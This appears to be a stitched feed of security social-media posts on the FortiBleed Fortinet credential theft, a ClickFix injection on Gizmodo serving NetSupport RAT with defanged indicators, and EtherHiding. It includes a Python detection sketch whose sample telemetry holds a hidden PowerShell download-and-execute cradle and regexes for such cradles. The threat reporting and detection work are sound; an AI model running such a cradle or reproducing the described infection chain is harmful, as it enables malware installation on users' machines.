
The threat actor who exploited Fortinet devices to steal VPN authentication hashes in a series of attacks known as FortiBleed has also launched attacks against Microsoft SQL database servers and Sophos firewalls

A known initial access broker has taken credit for the campaign in a dark web forum post

https://unit42.paloaltonetworks.com/large-scale-credential-attacks/

RE: https://infosec.exchange/@briankrebs/116780029181293028

Heads up, Gizmodo has been compromised by some #ErrTraffic affiliate too. Inject is in main response.
ErrTraffic C2 cdnpro-987[.]xyz (Resolved via #EtherHiding)
PS Payload domain cdnportal-us[.]xyz (dynamic PowerShell command URI path)
PowerShell downloads a 16MB encrypted 7z file, checks if 7z is installed and otherwise downloads it to unpack the file and run the contained EXE. The EXE will do some profiling (including refresh rate) and, if it passes, will drop #NetSupportRAT and run it.
NetSupport C2 178[.]16[.]55[.]191.

TA also has a Mac payload configured, but it seems broken at the moment and asks for a password for some zip file when executed 🤷

Note: ErrTraffic is a ClickFix-as-a-Service, so other compromised sites can lead to other malware from other affiliates.

Don't look now, but it seems Gizmodo's homepage is now serving up a Clickfix attack.

Basics of the ClickFix exploit, which causes a pasted command to fetch malware via Windows PowerShell.

https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/

#clickfix #gizmodo
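Added example, not code from either post above: a small Python detection sketch run over constructed Sysmon-style process-creation events. It looks for the chain the ErrTraffic post and the ClickFix explainer describe: PowerShell spawned from explorer.exe (the Win+R Run dialog) with a hidden window or a download cradle, a password-protected 7-Zip extraction under that PowerShell, and an EXE launched from a user-writable path, then correlates the hits back to the PowerShell process that started the chain. The event field names, hostnames, paths and password are placeholders I constructed for the example, not indicators from the posts.

```python
"""Detection sketch for a ClickFix-style chain:
Run dialog -> hidden PowerShell download cradle -> 7-Zip extraction -> payload EXE.
Input is a list of Sysmon Event ID 1-like dicts (pid, ppid, image, parent_image, cmdline).
"""
import re

# Constructed sample telemetry. Hostnames, paths and the archive password are
# placeholders for the example, not IOCs from the posts.
SAMPLE_EVENTS = [
    {"pid": 4120, "ppid": 900, "image": r"C:\Windows\explorer.exe",
     "parent_image": r"C:\Windows\System32\userinit.exe", "cmdline": "explorer.exe"},
    # Stage 1: user pastes the ClickFix command into Win+R -> PowerShell under explorer.exe
    {"pid": 5012, "ppid": 4120,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -nop -c "irm https://payload.example/p/5f3a | iex"'},
    # Stage 2: the downloaded script unpacks an encrypted 7z with a password
    {"pid": 5044, "ppid": 5012, "image": r"C:\Program Files\7-Zip\7z.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"7z.exe x C:\Users\bob\AppData\Local\Temp\pkg.7z -pS3cret -oC:\Users\bob\AppData\Local\Temp\pkg -y"},
    # Stage 3: the extracted EXE is run from %TEMP%
    {"pid": 5060, "ppid": 5012, "image": r"C:\Users\bob\AppData\Local\Temp\pkg\update.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "update.exe"},
    # Benign control: admin opens PowerShell from a terminal and extracts a plain archive
    {"pid": 6100, "ppid": 6000,
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\WindowsApps\WindowsTerminal.exe",
     "cmdline": "powershell -NoProfile"},
    {"pid": 6120, "ppid": 6100, "image": r"C:\Program Files\7-Zip\7z.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"7z.exe x C:\Users\bob\Downloads\logs.7z -oC:\Users\bob\Downloads\logs -y"},
]

POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
SEVENZIP = re.compile(r"\\7z[ar]?\.exe$", re.I)
EXPLORER = re.compile(r"\\explorer\.exe$", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+h(idden)?\b", re.I)          # -w hidden / -WindowStyle Hidden
CRADLE = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile|net\.webclient)\b", re.I)
EXTRACT = re.compile(r"\s[xe]\s")                                   # 7z x / 7z e
ARCHIVE_PW = re.compile(r"(^|\s)-p\S+")                              # 7z -p<password>
USER_WRITABLE = re.compile(r"\\(AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.I)


def evaluate(events):
    """Return (rule_name, pid) for every event matching one of the three stage rules."""
    alerts = []
    for ev in events:
        image, parent, cmd = ev["image"], ev.get("parent_image", ""), ev["cmdline"]
        # Stage 1: PowerShell directly under explorer.exe, hidden or pulling code from the web
        if POWERSHELL.search(image) and EXPLORER.search(parent) and (HIDDEN.search(cmd) or CRADLE.search(cmd)):
            alerts.append(("clickfix_run_dialog_powershell", ev["pid"]))
        # Stage 2: 7-Zip extracting a password-protected archive on behalf of PowerShell
        if SEVENZIP.search(image) and POWERSHELL.search(parent) and EXTRACT.search(cmd) and ARCHIVE_PW.search(cmd):
            alerts.append(("7z_password_extract_under_powershell", ev["pid"]))
        # Stage 3: a binary started by PowerShell from a user-writable drop location
        if POWERSHELL.search(parent) and USER_WRITABLE.search(image):
            alerts.append(("exe_from_temp_under_powershell", ev["pid"]))
    return alerts


def powershell_ancestor(by_pid, pid):
    """Walk the ppid chain and return the nearest PowerShell pid, or None."""
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        if POWERSHELL.search(by_pid[pid]["image"]):
            return pid
        pid = by_pid[pid]["ppid"]
    return None


def correlate(events):
    """Group alerts by the PowerShell process that anchors the chain: {ps_pid: [rules]}."""
    by_pid = {e["pid"]: e for e in events}
    chains = {}
    for rule, pid in evaluate(events):
        anchor = powershell_ancestor(by_pid, pid)
        if anchor is not None:
            chains.setdefault(anchor, set()).add(rule)
    return {anchor: sorted(rules) for anchor, rules in chains.items()}


if __name__ == "__main__":
    for anchor, rules in correlate(SAMPLE_EVENTS).items():
        severity = "high" if len(rules) >= 2 else "low"
        print(f"powershell pid {anchor}: {severity} ({', '.join(rules)})")
```

The benign control events show why correlation matters: 7-Zip under PowerShell is common on admin hosts, so a single stage match is a weak signal, while two or more stages hanging off the same PowerShell process that was itself spawned from explorer.exe is the shape the post describes. The stage where PowerShell fetches 7-Zip because it is not installed would surface as a 7z.exe image under one of the USER_WRITABLE paths and is a natural fourth rule to add.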

I have very conflicting feelings about this :D

#electronics #repair #righttorepair

Etherhiding is so hot right now. When your malware sample contains blockchain artifacts, learn how to pivot on them and get all the indicators from the campaign.

https://ifin-intel.org/blog/etherhiding/

Etherhiding: Hunting and Prevention | IFIN

So your malware sample pivoted to the blockchain. Learn how to follow the transactions and get the IOCs you need.

Mastodon 4.6 released today. It lets me force 2FA on accounts.

Also, heads up, I am going to force 2FA on accounts.

Note: this is only applicable to: infosec.exchange
infosec.space
ioc.exchange
convo.casa

An ecrime group has somehow gained access to 75k Fortinet firewall devices - dubbed Fortibleed

Blog https://www.infostealers.com/article/fortibleed-75000-fortinet-firewalls-compromised-global-enterprises-exposed-claim-your-ethical-disclosure/

Check if your domain is impacted: https://www.hudsonrock.com/fortinet

I’ve verified the data is real. They’ve been dumping the Fortinet config - not sure how yet - and then cracking the passwords it appears. Data is being resold online. #fortibleed